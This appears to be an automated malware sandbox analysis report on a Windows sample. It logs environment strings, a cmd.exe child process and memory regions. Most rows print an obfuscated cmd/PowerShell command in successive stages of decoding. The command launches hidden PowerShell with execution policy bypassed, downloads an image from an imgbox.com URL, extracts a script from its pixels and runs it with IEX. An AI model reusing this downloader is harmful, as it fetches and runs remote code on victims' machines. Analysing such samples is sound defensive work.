Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = }$]?, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[10.'+'.4)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#4).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn24).ReplaCE11{CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{4,24,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = {,., result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[10.'+'.4)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'1v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInG]{CTFAr]#4).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInG]{CTFAr]Dn24).ReplaCE11{CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInG]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{4,24,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = }{, result_out = set suLrv=. ( @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreacTF('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({matTF]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{CTFAr]#4).ReplaCE(({CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInG]{CTFAr]Dn24).ReplaCE(({CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInG]{CTFAr]#6))^&^& seT aDIz`=EcTFO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = .@_#, result_out = set suLrv=. ( @sjVelLId{Dn]+@shELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]Dn06),{sTRInG]{ChAr]Dn24).ReplaCE(({ChAr]DnDn8+{ChAr]54+{ChAr]8Dn),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = ]$*{, result_out = set suLrv=. ( @sHelLId{Dn]+@shELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)*Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]Dn06),{sTRInG]{ChAr]Dn24).ReplaCE(({ChAr]DnDn8+{ChAr]54+{ChAr]8Dn),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = #-, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^|tyOwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = .$+, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRiPT((LS eqvNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`PASS -nOPrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = +,\, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = ]#, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'{v6Q'+'_*428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = _`@#, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = [_, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = $_'}, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = \[,#, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Get Environment String | name = ,`, result_out = set suLrv=. ( $sHelLId[1]+$shELlId[13]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_*428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)*16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]34).ReplaCE(([ChAr]98+[ChAr]83+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]36))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) ^^^|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT ) ^&^& cmd.exE /c %adizY% |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 |
Process #8: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ^ft^Y^p^e | ^f^iN^d^S^t^r ^c^m |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb58 |
| Parent PID | 0xb50 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00044fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
